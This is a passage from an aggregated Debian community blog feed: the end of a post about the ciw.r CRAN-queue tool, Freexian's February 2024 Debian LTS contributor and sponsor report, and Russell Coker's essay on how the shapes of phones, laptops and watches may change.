<span id="cb2-18"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-18" tabindex="-1"></a></span>
<span id="cb2-19"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-19" tabindex="-1"></a><span class="ex">where</span> ARG... can be one or more file names, directories, or package names.</span>
<span id="cb2-20"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-20" tabindex="-1"></a></span>
<span id="cb2-21"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-21" tabindex="-1"></a><span class="ex">Examples:</span></span>
<span id="cb2-22"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-22" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-ip</span> <span class="co"># run in 'inspect' and 'pending' mode</span></span>
<span id="cb2-23"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-23" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-a</span> <span class="co"># run with mode 'auto' resolved in incoming()</span></span>
<span id="cb2-24"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-24" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="co"># run with defaults, same as '-itpwr'</span></span>
<span id="cb2-25"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-25" tabindex="-1"></a></span>
<span id="cb2-26"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-26" tabindex="-1"></a><span class="ex">When</span> no argument is given, <span class="st">'auto'</span> is selected which corresponds to <span class="st">'inspect'</span>, <span class="st">'waiting'</span>,</span>
<span id="cb2-27"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-27" tabindex="-1"></a><span class="st">'pending'</span><span class="ex">,</span> <span class="st">'pretest'</span>, and <span class="st">'recheck'</span>. Selecting <span class="st">'-m'</span> or <span class="st">'--mega'</span> selects all folders.</span>
<span id="cb2-28"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-28" tabindex="-1"></a></span>
<span id="cb2-29"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-29" tabindex="-1"></a><span class="ex">Folder</span> selecting arguments are cumulative<span class="kw">;</span> <span class="ex">but</span> <span class="st">'mega'</span> is a single selection of all folders</span>
<span id="cb2-30"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-30" tabindex="-1"></a><span class="kw">(</span><span class="ex">i.e.</span> <span class="st">'inspect'</span>, <span class="st">'waiting'</span>, <span class="st">'pending'</span>, <span class="st">'pretest'</span>, <span class="st">'recheck'</span>, <span class="st">'archive'</span>, <span class="st">'newbies'</span>, <span class="st">'publish'</span><span class="kw">)</span><span class="bu">.</span></span>
<span id="cb2-31"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-31" tabindex="-1"></a></span>
<span id="cb2-32"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-32" tabindex="-1"></a><span class="ex">ciw.r</span> is part of littler which brings <span class="st">'r'</span> to the command-line.</span>
<span id="cb2-33"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-33" tabindex="-1"></a><span class="ex">See</span> https://dirk.eddelbuettel.com/code/littler.html for more information.</span>
<span id="cb2-34"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-34" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
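<p>As a worked illustration of the flag semantics in the help text above, here is a minimal sketch in Python (not ciw.r's actual implementation, which is written in R; all names here are hypothetical) of how cumulative folder flags could resolve to a list of folders to visit:</p>

```python
# Hypothetical sketch of folder-flag resolution (not ciw.r's real code).
ALL_FOLDERS = ["inspect", "pretest", "pending", "waiting", "recheck",
               "archive", "newbies", "publish"]
AUTO = ["inspect", "pretest", "pending", "waiting", "recheck"]  # the 'auto' default
FLAGS = {"i": "inspect", "t": "pretest", "p": "pending", "w": "waiting",
         "r": "recheck", "a": "archive", "n": "newbies", "u": "publish"}

def resolve_folders(flags: str) -> list[str]:
    """Map short flags such as 'ip' to the incoming folders to visit."""
    if "m" in flags:                 # 'mega' is a single selection of all folders
        return list(ALL_FOLDERS)
    chosen = [FLAGS[f] for f in flags if f in FLAGS]
    return chosen or list(AUTO)      # no folder flags given: fall back to 'auto'
```

<p>Under these assumptions, <code>resolve_folders("ip")</code> visits the 'inspect' and 'pending' folders, matching the first example in the help text.</p>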
<p>The README at the <a href="https://github.com/eddelbuettel/ciw">git
repo</a> and the <a href="https://cran.r-project.org/package=ciw">CRAN
page</a> offer a ‘screenshot movie’ showing some of the options in
action.</p>
<p>I have been using the little tool quite a bit over the last two or
three weeks since I first put it together and find it quite handy. With
that, again a big <em>Thank You!</em> of appreciation for all that <a href="https://cran.r-project.org">CRAN</a> does—which this week included
letting this pass the <em>newbies</em> desk in under 24 hours.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-14T00:03:00+00:00Dirk EddelbuettelFreexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)
https://www.freexian.com/blog/debian-lts-report-2024-02/
<img src="https://www.freexian.com/images/debian-lts-logo.png" style="float: right;" />
<p>Like each month, have a look at the work funded by <a href="https://www.freexian.com/lts/debian/">Freexian’s Debian LTS offering</a>.</p>
<h3 id="debian-lts-contributors">Debian LTS contributors</h3>
<p>In February, 18 contributors were paid to work on <a href="https://wiki.debian.org/LTS">Debian
LTS</a>; their reports are available:</p>
<ul>
<li><a href="https://people.debian.org/~abhijith/reports/LTS_ELTS-February-2024.txt">Abhijith PA</a>
did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00008.html">Adrian Bunk</a>
did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00007.html">Bastien Roucariès</a>
did 20.0h (out of 20.0h assigned).</li>
<li><a href="https://www.decadent.org.uk/ben/blog/2024/03/03/foss-activity-in-february-2024.html">Ben Hutchings</a>
did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.</li>
<li><a href="https://chris-lamb.co.uk/posts/free-software-activities-in-february-2024#debian-lts">Chris Lamb</a>
did 18.0h (out of 18.0h assigned).</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00009.html">Daniel Leidert</a>
did 10.0h (out of 10.0h assigned).</li>
<li><a href="https://people.debian.org/~pochu/lts/reports/2024-02.txt">Emilio Pozuelo Monfort</a>
did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.</li>
<li><a href="https://lists.debian.org/msgid-search/?m=wr9W91X07BdEqlUY@debian.org">Guilhem Moulin</a>
did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.</li>
<li>Holger Levsen
did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.</li>
<li>Lee Garrett
did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.</li>
<li><a href="https://dl.gambaru.de/blog/202402_LTS_report.txt">Markus Koschany</a>
did 40.0h (out of 40.0h assigned).</li>
<li><a href="https://people.debian.org/~roberto/lts_elts_reports/2024-02.txt">Roberto C. Sánchez</a>
did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.</li>
<li><a href="https://people.debian.org/~santiago/lts-elts-reports/report-2024-02.txt">Santiago Ruano Rincón</a>
did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00001.html">Sean Whitton</a>
did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00003.html">Sylvain Beucler</a>
did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.</li>
<li><a href="http://blog.alteholz.eu/2024/03/my-debian-activities-in-february-2024/">Thorsten Alteholz</a>
did 14.0h (out of 14.0h assigned).</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00005.html">Tobias Frost</a>
did 12.0h (out of 12.0h assigned).</li>
<li><a href="https://utkarsh2102.org/posts/foss-in-feb-24/">Utkarsh Gupta</a>
did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75h to the next month.</li>
</ul>
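<p>The carry-over figures in the list above follow a simple pattern: hours carried to the next month are the hours assigned plus any hours carried in from the previous period, minus the hours actually worked. A minimal sketch (the helper name is ours, not part of any LTS tooling):</p>

```python
def carry_over(assigned: float, carried_in: float, worked: float) -> float:
    """Hours carried to the next month: assigned + carried in - worked."""
    return round(assigned + carried_in - worked, 2)

# e.g. Adrian Bunk: 24.25h assigned, 41.75h from the previous period, 13.5h done
assert carry_over(24.25, 41.75, 13.5) == 52.5
```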
<h3 id="evolution-of-the-situation">Evolution of the situation</h3>
<p>In February, we have released <a href="https://lists.debian.org/debian-lts-announce/2024/02/threads.html">17 DLAs</a>.</p>
<p>The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out not to affect Debian buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html">sudo</a> (to fix a privilege management issue), and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00008.html">iwd</a> and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00013.html">wpa</a> (both of which suffered from authentication bypass vulnerabilities).</p>
<p>While this has already been announced in the Freexian blog, we would like to mention here the start of the <a href="https://www.freexian.com/blog/samba-4.17-lts/">Long Term Support project for Samba 4.17</a>. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, <a href="https://www.catalyst.net.nz/samba-and-windows-integration">Catalyst</a>, towards improving the security support of Samba in Debian 12 (Bookworm).</p>
<h3 id="thanks-to-our-sponsors">Thanks to our sponsors</h3>
<p>Sponsors that joined recently are in bold.</p>
<ul>
<li>Platinum sponsors:
<ul>
<li><a href="http://www.toshiba.co.jp/worldwide/index.html">TOSHIBA</a> (for 102 months)</li>
<li><a href="https://cip-project.org">Civil Infrastructure Platform (CIP)</a> (for 70 months)</li>
</ul>
</li>
<li>Gold sponsors:
<ul>
<li><a href="https://www.roche.com/about/business/diagnostics.htm">Roche Diagnostics International AG</a> (for 113 months)</li>
<li><a href="http://www.linode.com">Linode</a> (for 107 months)</li>
<li><a href="http://www.babiel.com">Babiel GmbH</a> (for 96 months)</li>
<li><a href="https://www.plathome.com">Plat’Home</a> (for 96 months)</li>
<li><a href="https://www.cineca.it">CINECA</a> (for 70 months)</li>
<li><a href="http://www.ox.ac.uk">University of Oxford</a> (for 52 months)</li>
<li><a href="https://deveryware.com">Deveryware</a> (for 39 months)</li>
<li><a href="https://vyos.io">VyOS Inc</a> (for 34 months)</li>
<li><a href="https://www.edf.fr">EDF SA</a> (for 23 months)</li>
</ul>
</li>
<li>Silver sponsors:
<ul>
<li><a href="http://www.domainnameshop.com">Domeneshop AS</a> (for 117 months)</li>
<li><a href="http://www.nantesmetropole.fr/">Nantes Métropole</a> (for 112 months)</li>
<li><a href="http://www.univention.de">Univention GmbH</a> (for 103 months)</li>
<li><a href="http://portail.univ-st-etienne.fr/">Université Jean Monnet de St Etienne</a> (for 103 months)</li>
<li><a href="https://ribboncommunications.com/">Ribbon Communications, Inc.</a> (for 97 months)</li>
<li><a href="https://www.exonet.nl">Exonet B.V.</a> (for 87 months)</li>
<li><a href="https://www.lrz.de">Leibniz Rechenzentrum</a> (for 81 months)</li>
<li><a href="https://www.diplomatie.gouv.fr">Ministère de l’Europe et des Affaires Étrangères</a> (for 64 months)</li>
<li><a href="https://www.cloudways.com">Cloudways by DigitalOcean</a> (for 54 months)</li>
<li><a href="https://dinahosting.com">Dinahosting SL</a> (for 52 months)</li>
<li><a href="https://www.bauermedia.com">Bauer Xcel Media Deutschland KG</a> (for 46 months)</li>
<li><a href="https://platform.sh">Platform.sh SAS</a> (for 46 months)</li>
<li><a href="https://www.moxa.com">Moxa Inc.</a> (for 40 months)</li>
<li><a href="https://sipgate.de">sipgate GmbH</a> (for 37 months)</li>
<li><a href="https://ovhcloud.com">OVH US LLC</a> (for 35 months)</li>
<li><a href="https://www.tilburguniversity.edu/">Tilburg University</a> (for 35 months)</li>
<li><a href="https://www.gsi.de">GSI Helmholtzzentrum für Schwerionenforschung GmbH</a> (for 27 months)</li>
<li><a href="https://www.soliton.co.jp">Soliton Systems K.K.</a> (for 24 months)</li>
</ul>
</li>
<li>Bronze sponsors:
<ul>
<li><a href="http://www.evolix.fr">Evolix</a> (for 118 months)</li>
<li><a href="http://www.seznam.cz">Seznam.cz, a.s.</a> (for 118 months)</li>
<li><a href="http://intevation.de">Intevation GmbH</a> (for 115 months)</li>
<li><a href="http://linuxhotel.de">Linuxhotel GmbH</a> (for 115 months)</li>
<li><a href="https://waays.fr">Daevel SARL</a> (for 113 months)</li>
<li><a href="http://bitfolk.com">Bitfolk LTD</a> (for 112 months)</li>
<li><a href="http://www.megaspace.de">Megaspace Internet Services GmbH</a> (for 112 months)</li>
<li><a href="http://numlog.fr">NUMLOG</a> (for 112 months)</li>
<li><a href="http://www.greenbone.net">Greenbone AG</a> (for 111 months)</li>
<li><a href="http://www.wingo.ch/">WinGo AG</a> (for 111 months)</li>
<li><a href="http://lheea.ec-nantes.fr">Ecole Centrale de Nantes - LHEEA</a> (for 107 months)</li>
<li><a href="https://www.entrouvert.com/">Entr’ouvert</a> (for 102 months)</li>
<li><a href="https://adfinis.com">Adfinis AG</a> (for 99 months)</li>
<li><a href="http://www.allogarage.fr">GNI MEDIA</a> (for 94 months)</li>
<li><a href="http://www.legi.grenoble-inp.fr">Laboratoire LEGI - UMR 5519 / CNRS</a> (for 94 months)</li>
<li><a href="https://www.tesorion.nl/">Tesorion</a> (for 94 months)</li>
<li><a href="http://bearstech.com">Bearstech</a> (for 85 months)</li>
<li><a href="http://lihas.de">LiHAS</a> (for 85 months)</li>
<li><a href="http://www.catalyst.net.nz">Catalyst IT Ltd</a> (for 80 months)</li>
<li><a href="http://www.supagro.fr">Supagro</a> (for 75 months)</li>
<li><a href="https://demarcq.net">Demarcq SAS</a> (for 74 months)</li>
<li><a href="https://www.univ-grenoble-alpes.fr">Université Grenoble Alpes</a> (for 60 months)</li>
<li><a href="https://www.touchweb.fr">TouchWeb SAS</a> (for 52 months)</li>
<li><a href="https://www.spin-ag.de">SPiN AG</a> (for 49 months)</li>
<li><a href="https://www.corefiling.com">CoreFiling</a> (for 44 months)</li>
<li><a href="http://www.isc.cnrs.fr">Institut des sciences cognitives Marc Jeannerod</a> (for 39 months)</li>
<li><a href="https://www.osug.fr/">Observatoire des Sciences de l’Univers de Grenoble</a> (for 36 months)</li>
<li><a href="https://www.werfen.com">Tem Innovations GmbH</a> (for 31 months)</li>
<li><a href="https://wordfinder.pro">WordFinder.pro</a> (for 30 months)</li>
<li><a href="https://www.resif.fr">CNRS DT INSU Résif</a> (for 29 months)</li>
<li><a href="https://www.alterway.fr">Alter Way</a> (for 22 months)</li>
<li><a href="https://math.univ-lyon1.fr">Institut Camille Jordan</a> (for 11 months)</li>
</ul>
</li>
</ul>2024-03-14T00:00:00+00:00Roberto C. SánchezRussell Coker: The Shape of Computers
https://etbe.coker.com.au/2024/03/13/shape-computers/
<h2>Introduction</h2>
<p>There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller; the earliest computers had entire buildings dedicated to them. Recently, for some classes of computer, devices have become as small as could reasonably be desired. For example, phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old-fashioned watches they replace, and NUC-type computers are as small as they need to be given the size of the monitors etc that they connect to.</p>
<p>This means that further development in the size and shape of computers will largely be determined by human factors.</p>
<p>I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.</p>
<p>Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.</p>
<h2>Desktop/Laptop PCs</h2>
<p>When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well-known example. This has lost popularity due to the demand for multiple options for a light keyboard that can be moved for convenience, combined with multiple options for the box part. But it still pops up occasionally, such as the <a href="https://www.raspberrypi.com/products/raspberry-pi-400/">Raspberry Pi 400 [1]</a> which succeeds due to the computer part being small and light. I think this type of computer will remain a niche product. It could be used in an “add a screen to make a laptop” model as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.</p>
<p>The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.</p>
<p>The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment <a href="https://jenson.org/text/">text editing with a touch screen is an unsolved problem in computer science [2]</a>.</p>
<p>The <a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/">Lenovo Thinkpad X1 Fold [3]</a> and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter, which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry, and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard, which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one; prices are as low as US$600.</p>
<p>I think that the typical interfaces for desktop PCs (e.g. MS-Windows and KDE) don’t work well for small devices and touch devices, and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE; I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside, it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.</p>
<p>We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs; it didn’t take off, largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone, so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.</p>
<h2>The Interesting New Things</h2>
<h3>Watch Like</h3>
<p>The <a href="https://en.wikipedia.org/wiki/Watch">wrist-watch [4]</a> has been a standard format for easy access to data when on the go since its military use at the end of the 19th century, when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the foreseeable future. For comparison, smart phones have been in widespread use as “pocket watches” for about 10 years.</p>
<p>The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the <a href="https://en.wikipedia.org/wiki/Calculator_watch">calculator watch [5]</a> which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?</p>
<h3>Phone Like</h3>
<p>Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). <a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html">Phones and tablets with multiple folds are coming out now [6]</a>. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">I’ve previously written about Convergence between phones and desktop computers [7]</a>, the increased capabilities of phones adds to the case for Convergence.</p>
<p>Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors, and the possibilities raised by folding phones only add to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus, so you send a CTRL-W or ALT-F4 to the wrong screen by mistake; it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them); it will be interesting to see how that goes.</p>
<p>Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet-sized display easily, and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet-size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3); that’s enough for a lot of phone functionality.</p>
<p>The <a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date">Rabbit R1 [8]</a> and the <a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak">Humane AI Pin [9]</a> have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.</p>
<h3>Laptop Like</h3>
<p>One interesting PC variant I just discovered is the <a href="https://www.aliexpress.com/store/1103322555">Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]</a>. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built-in battery is AU$423, which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.</p>
<p>The recent release of the <a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro">Apple Vision Pro [11]</a> has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about <a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/">the possibility of using augmented reality technology for providing a desktop computing environment [12]</a>. I wonder how a Vision Pro would work for that on a train or passenger jet.</p>
<p>Another interesting thing that’s on offer is a <a href="https://www.aliexpress.com/item/1005005999353358.html">laptop with 7″ touch screen beside the keyboard [13]</a>. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.</p>
<h2>Useful Hardware for Developing These Things</h2>
<p><a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/">I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14]</a>, and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works, which makes such units cheap while still allowing touch screen functionality to be tested.</p>
<p><a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/">The PineTime is a nice smart watch from Pine64 which is designed to be open [15]</a>. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the <a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/">Raspberry Pi Watch [16]</a> is interesting too.</p>
<p><a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/">The PinePhonePro is an OK phone made to open standards but its hardware isn’t as good as Android phones released in the same year [17]</a>. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The <a href="https://etbe.coker.com.au/2022/03/19/more-librem5/">Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18]</a>, but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.</p>
<p>Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35, so they are probably not worth getting if you can get a wwan device that does GPS as well.</p>
<h2>What We Must Do</h2>
<p>Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document; I spent 15 minutes looking at it and couldn’t get it going.</p>
<p>To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.</p>
<p>Support for changing screen resolution is already there, as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens; I haven’t investigated this properly yet, but it definitely doesn’t work as expected in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.</p>
<p>ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.</p>
<p>Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability, and while Android is usable for its own special apps it’s not usable in an “I want to run applications that use any files from any other applications in any way I want” sense. My post about <a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/">Sandboxing Phone apps is relevant for people who are interested in this [19]</a>. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.</p>
<p>I will write more posts about these things.</p>
<p>Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.</p>
<ul>
<li>[1]<a href="https://www.raspberrypi.com/products/raspberry-pi-400/"> https://www.raspberrypi.com/products/raspberry-pi-400/</a></li>
<li>[2]<a href="https://jenson.org/text/"> https://jenson.org/text/</a></li>
<li>[3]<a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/"> http://tinyurl.com/27lrakl6</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Watch"> https://en.wikipedia.org/wiki/Watch</a></li>
<li>[5]<a href="https://en.wikipedia.org/wiki/Calculator_watch"> https://en.wikipedia.org/wiki/Calculator_watch</a></li>
<li>[6]<a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html"> http://tinyurl.com/27gb7zrq</a></li>
<li>[7]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[8]<a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date"> http://tinyurl.com/yuurhkvm</a></li>
<li>[9]<a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak"> http://tinyurl.com/ytmw42bt</a></li>
<li>[10]<a href="https://www.aliexpress.com/store/1103322555"> https://www.aliexpress.com/store/1103322555</a></li>
<li>[11]<a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro"> https://en.wikipedia.org/wiki/Apple_Vision_Pro</a></li>
<li>[12]<a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/"> https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/</a></li>
<li>[13]<a href="https://www.aliexpress.com/item/1005005999353358.html"> https://www.aliexpress.com/item/1005005999353358.html</a></li>
<li>[14]<a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/"> https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/</a></li>
<li>[15]<a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/"> https://etbe.coker.com.au/2023/10/21/more-about-pinetime/</a></li>
<li>[16]<a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/"> http://tinyurl.com/24myjjqn</a></li>
<li>[17]<a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/"> https://etbe.coker.com.au/2023/10/11/pinephone-status/</a></li>
<li>[18]<a href="https://etbe.coker.com.au/2022/03/19/more-librem5/"> https://etbe.coker.com.au/2022/03/19/more-librem5/</a></li>
<li>[19]<a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/"> https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/31/my-ideal-mobile-phone/" rel="bookmark" title="My Ideal Mobile Phone">My Ideal Mobile Phone</a> <small>Based on my experience testing the IBM Seer software on...</small></li>
<li><a href="https://etbe.coker.com.au/2023/06/01/desktop-computers-sense/" rel="bookmark" title="Do Desktop Computers Make Sense?">Do Desktop Computers Make Sense?</a> <small>Laptop vs Desktop Price Currently the smaller and cheaper USB-C...</small></li>
